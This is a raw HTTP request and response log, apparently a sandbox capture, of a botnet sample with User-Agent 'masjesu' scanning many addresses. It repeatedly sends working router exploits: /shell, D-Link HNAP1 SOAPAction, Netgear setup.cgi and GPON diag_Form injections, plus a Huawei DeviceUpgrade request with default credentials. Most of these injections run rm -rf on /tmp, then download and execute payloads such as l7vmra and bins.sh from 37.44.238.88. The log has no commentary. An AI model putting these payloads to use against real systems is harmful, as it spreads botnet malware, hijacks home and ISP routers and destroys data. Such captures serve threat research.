                            104.24.157.51:8080
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:8080
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Fri, 28 Feb 2025 19:33:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: same-origin
                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                            Vary: Accept-Encoding
                            Server: cloudflare
                            CF-RAY: 9192d911e8dff668-LHR
                            Content-Encoding: gzip
                          • GET
                            http://4.182.16.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 4.182.16.236:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 404 Not Found
                            Date: Fri, 28 Feb 2025 19:33:47 GMT
                            Content-Length: 0
                            Connection: keep-alive
                            Server: Kestrel
                          • POST
                            http://4.182.16.236:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 4.182.16.236:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                          • GET
                            http://4.182.16.236:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 400 Bad Request
                            Date: Fri, 28 Feb 2025 19:33:47 GMT
                            Content-Length: 0
                            Connection: close
                            Server: Kestrel
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 404 Not Found
                            Date: Fri, 28 Feb 2025 19:33:47 GMT
                            Content-Length: 0
                            Connection: keep-alive
                            Server: Kestrel
                          • DNS
                            Response
                            HTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:33:47 GMT
                            Content-Type: text/html
                            Content-Length: 150
                            Connection: close
                          • GET
                            http://37.202.169.166:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 404 Not Found
                            CONNECTION: close
                            CONTENT-LENGTH: 48
                            Strict-Transport-Security: max-age=604800; includeSubDomains
                            X-XSS-Protection: 1;mode=block
                            Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
                            X-Content-Type-Options: nosniff
                            CONTENT-TYPE: text/html
                          • POST
                            http://127.0.0.1:8080/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:8080
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                          • GET
                            http://104.130.219.14:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 104.130.219.14:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 302 Found
                            Date: Fri, 28 Feb 2025 19:34:01 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Location: https://www.astarna.com/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Content-Length: 371
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=iso-8859-1
                          • POST
                            http://104.130.219.14:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 104.130.219.14:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.1 400 Bad Request
                            Date: Fri, 28 Feb 2025 19:34:01 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                          • GET
                            http://104.130.219.14:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 302 Found
                            Date: Fri, 28 Feb 2025 19:34:01 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Location: https://www.astarna.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Content-Length: 447
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 302 Found
                            Date: Fri, 28 Feb 2025 19:34:03 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            X-Frame-Options: SAMEORIGIN
                            X-Content-Type-Options: nosniff
                            Location: https://www.astarna.com/GponForm/diag_Form?images/
                            Content-Length: 309
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=iso-8859-1
                          • GET
                            http://23.0.152.238:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 23.0.152.238:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 312
                            Expires: Fri, 28 Feb 2025 19:34:11 GMT
                            Date: Fri, 28 Feb 2025 19:34:11 GMT
                            Connection: close
                          • POST
                            http://23.0.152.238:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 23.0.152.238:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 351
                            Expires: Fri, 28 Feb 2025 19:34:11 GMT
                            Date: Fri, 28 Feb 2025 19:34:11 GMT
                            Connection: close
                          • GET
                            http://23.0.152.238:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 310
                            Expires: Fri, 28 Feb 2025 19:34:11 GMT
                            Date: Fri, 28 Feb 2025 19:34:11 GMT
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 310
                            Expires: Fri, 28 Feb 2025 19:34:11 GMT
                            Date: Fri, 28 Feb 2025 19:34:11 GMT
                            Connection: close
                          • GET
                            http://85.159.98.204:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 85.159.98.204:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.0 302 Moved Temporarily
                            Location: https://85.159.98.204/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Server: BigIP
                            Connection: Keep-Alive
                            Content-Length: 0
                          • POST
                            http://85.159.98.204:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 85.159.98.204:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.0 302 Moved Temporarily
                            Location: https://85.159.98.204/HNAP1/
                            Server: BigIP
                            Connection: close
                            Content-Length: 0
                          • GET
                            http://85.159.98.204:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.0 302 Moved Temporarily
                            Location: https:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Server: BigIP
                            Connection: close
                            Content-Length: 0
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.0 302 Moved Temporarily
                            Location: https://127.0.0.1/GponForm/diag_Form?images/
                            Server: BigIP
                            Connection: Keep-Alive
                            Content-Length: 0
                          • GET
                            http://154.215.93.212:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 154.215.93.212:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                          • POST
                            http://154.215.93.212:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 154.215.93.212:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                          • GET
                            http://154.215.93.212:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                          • GET
                            http://79.132.136.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 79.132.136.127:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                          • POST
                            http://79.132.136.127:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 79.132.136.127:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                          • GET
                            http://79.132.136.127:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                          • POST
                            http://35.186.199.150:37215/ctrlt/DeviceUpgrade_1
                            Request
                            POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Host: 35.186.199.150:37215
                            Content-Length: 601
                            Connection: keep-alive
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                          • GET
                            http://23.44.178.183:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 23.44.178.183:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 312
                            Expires: Fri, 28 Feb 2025 19:34:40 GMT
                            Date: Fri, 28 Feb 2025 19:34:40 GMT
                            Connection: close
                          • POST
                            http://23.44.178.183:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 23.44.178.183:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 351
                            Expires: Fri, 28 Feb 2025 19:34:40 GMT
                            Date: Fri, 28 Feb 2025 19:34:40 GMT
                            Connection: close
                          • GET
                            http://23.44.178.183:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 312
                            Expires: Fri, 28 Feb 2025 19:34:40 GMT
                            Date: Fri, 28 Feb 2025 19:34:40 GMT
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 310
                            Expires: Fri, 28 Feb 2025 19:34:40 GMT
                            Date: Fri, 28 Feb 2025 19:34:40 GMT
                            Connection: close
                          • POST
                            http://127.0.0.1:5555/UD/act?1
                            Request
                            POST /UD/act?1 HTTP/1.1
                            Host: 127.0.0.1:5555
                            User-Agent: masjesu
                            SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                            Content-Type: text/xml
                            Content-Length: 640
                          • GET
                            http://104.71.127.59:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 104.71.127.59:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 310
                            Expires: Fri, 28 Feb 2025 19:34:45 GMT
                            Date: Fri, 28 Feb 2025 19:34:45 GMT
                            Connection: close
                          • POST
                            http://104.71.127.59:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 104.71.127.59:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 351
                            Expires: Fri, 28 Feb 2025 19:34:45 GMT
                            Date: Fri, 28 Feb 2025 19:34:45 GMT
                            Connection: close
                          • GET
                            http://104.71.127.59:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 312
                            Expires: Fri, 28 Feb 2025 19:34:45 GMT
                            Date: Fri, 28 Feb 2025 19:34:45 GMT
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 312
                            Expires: Fri, 28 Feb 2025 19:34:45 GMT
                            Date: Fri, 28 Feb 2025 19:34:45 GMT
                            Connection: close
                          • GET
                            http://38.174.170.219:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 38.174.170.219:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                          • POST
                            http://38.174.170.219:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 38.174.170.219:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                          • GET
                            http://38.174.170.219:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                          • GET
                            http://63.195.198.112:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 63.195.198.112:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 302 Found
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:34:48 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-XSS-Protection: 0
                            X-Content-Type-Options: nosniff
                            X-Download-Options: noopen
                            X-Permitted-Cross-Domain-Policies: none
                            Referrer-Policy: strict-origin-when-cross-origin
                            Cache-control: close,private,no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0,false
                            Pragma: no-cache
                            Location: https://vgw1-01.mia-avalonmerrickpark.mdu.attwifi.com/portal/attwifi?desired_url=http%3A%2F%2F63.195.198.112%2Fshell%3Fcd%2B%2Ftmp%3Brm%2B-rf%2B%2A%3Bwget%2Bhttp%3A%2F%2F37.44.238.88%2Fl7vmra%3Bchmod%2B777%2Bl7vmra%3B%2Ftmp%2Fl7vmra
                            X-Request-Id: 04d96d70-4624-4699-985a-c4411a062f1a
                            X-Runtime: 0.176486
                            Vary: Origin
                          • POST
                            http://63.195.198.112:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 63.195.198.112:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                          • GET
                            http://63.195.198.112:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:34:48 GMT
                            Content-Type: text/html
                            Content-Length: 0
                            Connection: keep-alive
                            X-XSS-Protection: 0
                            X-Content-Type-Options: nosniff
                            X-Download-Options: noopen
                            X-Permitted-Cross-Domain-Policies: none
                            Referrer-Policy: strict-origin-when-cross-origin
                            Cache-Control: no-cache
                            X-Request-Id: 7502cec8-201e-4f5b-a163-14fe4c3408e1
                            X-Runtime: 0.133404
                            Vary: Origin
                          • DNS
                            Response
                            HTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:34:48 GMT
                            Content-Type: text/html
                            Content-Length: 150
                            Connection: close
                          • GET
                            http://23.35.51.108:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 23.35.51.108:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 308
                            Expires: Fri, 28 Feb 2025 19:34:56 GMT
                            Date: Fri, 28 Feb 2025 19:34:56 GMT
                            Connection: close
                          • POST
                            http://23.35.51.108:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 23.35.51.108:80
                            Content-Type: text/xml; charset="utf-8"
